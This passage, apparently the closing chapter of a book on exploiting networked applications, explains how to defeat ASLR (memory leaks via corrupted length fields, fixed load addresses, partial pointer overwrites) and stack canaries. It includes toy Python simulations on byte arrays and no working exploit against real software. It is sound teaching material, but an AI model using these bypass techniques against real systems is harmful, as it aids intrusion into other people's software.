For this kind of exploit, you don’t always need to find a specific memory information disclosure vulnerability; in some cases, you can create one from a memory corruption vulnerability. Suppose a heap memory corruption vulnerability lets us reliably overwrite an arbitrary number of bytes after a heap allocation. One common structure that might be allocated on the heap is a buffer containing a length-prefixed string: when the string buffer is allocated, a few additional bytes are placed at the front to accommodate a length field, and the string data is stored after the length, as shown in Figure 10-10.

image

Figure 10-10: Converting memory corruption to information disclosure

At the top is the original pattern of heap allocations. If the vulnerable allocation is placed prior to the string buffer in memory, we would have the opportunity to corrupt the string buffer. Prior to any corruption occurring, we can only read the 5 valid bytes from the string buffer.

At the bottom, we cause the vulnerable allocation to overflow by just enough to modify only the length field of the string. We can set the length to an arbitrary value, in this case, 100 bytes. Now when we read back the string, we’ll get back 100 bytes instead of only the 5 bytes that were originally allocated. Because the string buffer’s allocation is not that large, data from other allocations would be returned, which could include sensitive memory addresses, such as VTable pointers and heap allocation pointers. This disclosure gives you enough information to bypass ASLR.
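To make the idea concrete, this corruption-to-disclosure trick can be simulated in a few lines of Python, modeling the heap as a flat byte array. The offsets and the 1-byte length prefix are illustrative assumptions, not any real allocator’s layout:

```python
# Simulate two adjacent heap allocations: a vulnerable 8-byte buffer
# followed by a length-prefixed string (1-byte length, then data),
# with other heap data after it.
heap = bytearray(8)                             # vulnerable allocation
heap += bytes([5]) + b"Hello" + b"\x00" * 100   # string: length=5, then data

STRING_OFFSET = 8

def read_string(mem, offset):
    """Read a length-prefixed string starting at offset."""
    length = mem[offset]
    return bytes(mem[offset + 1:offset + 1 + length])

print(read_string(heap, STRING_OFFSET))  # b'Hello' -- only the 5 valid bytes

# The overflow writes one byte past the vulnerable allocation,
# corrupting the string's length field.
heap[8] = 100
leaked = read_string(heap, STRING_OFFSET)
print(len(leaked))  # 100 -- now includes data from adjacent allocations
```

In a real heap, those extra 95 bytes could contain pointers whose values reveal the randomized base addresses of modules or the heap itself.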

Exploiting ASLR Implementation Flaws

The implementation of ASLR is never perfect due to limitations of performance and available memory. These shortcomings lead to various implementation-specific flaws, which you can also use to disclose the randomized memory locations.

Most commonly, the location of an executable isn’t re-randomized between two separate processes. This results in a vulnerability that allows you to disclose the location of memory using one connection to a networked application, even if doing so causes that particular process to crash; the disclosed memory address can then be used in a subsequent exploit.

On Unix-like systems, such as Linux, this lack of randomization should only occur if the process being exploited is forked from an existing master process. When a process forks, the OS creates an identical copy of the original process, including all loaded executable code. It’s fairly common for servers, such as Apache, to use a forking model to service new connections. A master process will listen on a server socket waiting for new connections, and when one is made, a new copy of the current process is forked and the connected socket gets passed to service the connection.

On Windows systems, the flaw manifests in a different way. Windows doesn’t really support forking processes; instead, once a specific executable file’s load address has been randomized, the file will always be loaded at that same address until the system is rebooted. If this weren’t done, the OS wouldn’t be able to share read-only memory between processes, resulting in increased memory usage.

From a security perspective, the result is that if you can leak a location of an executable once, the memory locations will stay the same until the system is rebooted. You can use this to your advantage because you can leak the location from one execution (even if it causes the process to crash) and then use that address for the final exploit.

Bypassing ASLR Using Partial Overwrites

Another way to circumvent ASLR is to use partial overwrites. Because memory tends to be split into distinct pages, such as 4096-byte pages, operating systems are restricted in how randomly they can place memory and executable code. For example, Windows performs memory allocations on 64KB boundaries. This leads to an interesting weakness: the lower bits of randomized memory pointers can be predictable even if the upper bits are totally random.

The lack of randomization in the lower bits might not sound like much of an issue, because you would still need to guess the upper bits of the address if you’re overwriting a pointer in memory. However, on a little endian architecture, it does allow you to selectively overwrite part of the pointer value, due to the way pointer values are stored in memory.

The majority of processor architectures in use today are little endian (I discussed endianness in more detail in “Binary Endian” on page 41). The most important detail to know about little endian for partial overwrites is that the lower bits of a value are stored at a lower address. Memory corruptions, such as stack or heap overflows, typically write from a low to a high address. Therefore, if you can control the length of the overwrite, it would be possible to selectively overwrite only the predictable lower bits but not the randomized higher bits. You can then use the partial overwrite to convert a pointer to address another memory location, such as a ROP gadget. Figure 10-11 shows how to change a memory pointer using a partial overwrite.

image

Figure 10-11: An example of a short overwrite

We start with an address of 0x07060504. We know that, due to ASLR, the top 16 bits (the 0x0706 part) are randomized, but the lower 16 bits are not. If we know what memory the pointer is referencing, we can selectively change the lower bits and accurately specify a location to control. In this example, we overwrite the lower 16 bits to make a new address of 0x0706BBAA.
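You can verify the little endian mechanics of this partial overwrite with a short Python snippet using the same example values:

```python
import struct

# A randomized pointer: the top 16 bits (0x0706) come from ASLR;
# the bottom 16 bits (0x0504) are predictable.
pointer = struct.pack("<I", 0x07060504)

# A length-controlled overflow that writes only 2 bytes replaces the
# low-order bytes first, because little endian stores them at the
# lower address. The randomized high bytes are left untouched.
overwrite = struct.pack("<H", 0xBBAA)
corrupted = overwrite + pointer[2:]

print(hex(struct.unpack("<I", corrupted)[0]))  # 0x706bbaa
```

The resulting pointer, 0x0706BBAA, still carries the correct randomized upper bits, so it points into the same module without the attacker ever learning the ASLR base.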

Detecting Stack Overflows with Memory Canaries

Memory canaries, or cookies, are used to prevent exploitation of a memory corruption vulnerability by detecting the corruption and immediately causing the application to terminate. You’ll most commonly encounter them in reference to stack memory corruption prevention, but canaries are also used to protect other types of data structures, such as heap headers or virtual table pointers.

A memory canary is a random number generated by an application during startup. The random number is stored in a global memory location so it can be accessed by all code in the application. This random number is pushed onto the stack when entering a function. Then, when the function is exited, the random value is popped off the stack and compared to the global value. If the global value doesn’t match what was popped off the stack, the application assumes the stack memory has been corrupted and terminates the process as quickly as possible. Figure 10-12 shows how inserting this random number detects danger, like a canary in a coal mine, helping to prevent the attacker from gaining access to the return address.

image

Figure 10-12: A stack overflow with a stack canary

Placing the canary below the return address on the stack ensures that any overflow corruption that would modify the return address would also modify the canary. As long as the canary value is difficult to guess, the attacker can’t gain control over the return address. Before the function returns, it calls code to check whether the stack canary matches what it expects. If there’s a mismatch, the program immediately crashes.
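The canary mechanism itself is easy to model. The following sketch simulates a protected stack frame as a byte array; the names, sizes, and layout are illustrative, not the real compiler-generated code:

```python
import os

# The "global" canary, generated once at application startup.
STACK_CANARY = os.urandom(4)

def run_function(input_data):
    """Simulate a protected frame: [16-byte buffer][canary][return address]."""
    frame = bytearray(16) + STACK_CANARY + b"\x10\x20\x30\x40"
    # An unchecked copy into the 16-byte buffer -- the overflow.
    frame[:len(input_data)] = input_data
    # The function epilogue: compare the saved canary to the global value.
    if frame[16:20] != STACK_CANARY:
        raise RuntimeError("stack smashing detected")
    return bytes(frame[20:24])  # the (intact) return address

run_function(b"A" * 8)       # fits in the buffer; the check passes
try:
    run_function(b"A" * 24)  # overwrites the canary and return address
except RuntimeError as e:
    print(e)                 # stack smashing detected
```

Any overflow long enough to reach the return address must first trample the canary, so the check fires before the corrupted return address is ever used.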

Bypassing Canaries by Corrupting Local Variables

Typically, stack canaries protect only the return address of the currently executing function on the stack. However, there are more things on the stack that can be exploited than just the buffer that’s being overflowed. There might be pointers to functions, pointers to class objects that have a virtual function table, or, in some cases, an integer variable that can be overwritten that might be enough to exploit the stack overflow.

If the stack buffer overflow has a controlled length, it might be possible to overwrite these variables without ever corrupting the stack canary. Even if the canary is corrupted, it might not matter as long as the variable is used before the canary is checked. Figure 10-13 shows how attackers might corrupt local variables without affecting the canary.

In this example, we have a function with a function pointer on the stack. Due to how the stack memory is laid out, the buffer we’ll overflow is at a lower address than the function pointer f, which is also located on the stack.

When the overflow executes, it corrupts all memory above the buffer, including the return address and the stack canary. However, before the canary-checking code runs (which would terminate the process), the function pointer f is used. This means we still get code execution by calling through f, and the corruption is never detected.

image

Figure 10-13: Corrupting local variables without setting off the stack canary

Modern compilers can protect against the corruption of local variables in several ways, including reordering variables so that buffers are always placed above any variable that, if corrupted, could be used to exploit the vulnerability.

Bypassing Canaries with Stack Buffer Underflow

For performance reasons, not every function will place a canary on the stack. If the function doesn’t manipulate a memory buffer on the stack, the compiler might consider it safe and not emit the instructions necessary to add the canary. In most cases, this is the correct thing to do. However, some vulnerabilities overflow a stack buffer in unusual ways: for example, the vulnerability might cause an underflow instead of an overflow, corrupting data lower in the stack. Figure 10-14 shows an example of this kind of vulnerability.

Figure 10-14 illustrates three steps. First, the function DoSomething() is called. This function sets up a buffer on the stack. The compiler determines that this buffer needs to be protected, so it generates a stack canary to prevent an overflow from overwriting the return address of DoSomething(). Second, the function calls the Process() method, passing a pointer to the buffer it set up. This is where the memory corruption occurs. However, instead of overflowing the buffer, Process() writes to a value below it, for example, by referencing p[-1]. This corrupts the return address of the Process() method’s stack frame, which has no stack canary protection of its own. Third, Process() returns to the corrupted return address, resulting in shell code execution.

image

Figure 10-14: Stack buffer underflow

Final Words

Finding and exploiting vulnerabilities in a network application can be difficult, but this chapter introduced some techniques you can use. I described how to triage vulnerabilities to determine the root cause using a debugger; with the knowledge of the root cause, you can proceed to exploit the vulnerability. I also provided examples of writing simple shell code and then developing a payload using ROP to bypass a common exploit mitigation, DEP. Finally, I described some other common exploit mitigations on modern operating systems, such as ASLR and memory canaries, and techniques to circumvent them.

This is the final chapter in this book. At this point you should be armed with the knowledge of how to capture, analyze, reverse engineer, and exploit networked applications. The best way to improve your skills is to find as many network applications and protocols as you can. With experience, you’ll easily spot common structures and identify patterns of protocol behavior where security vulnerabilities are typically found.
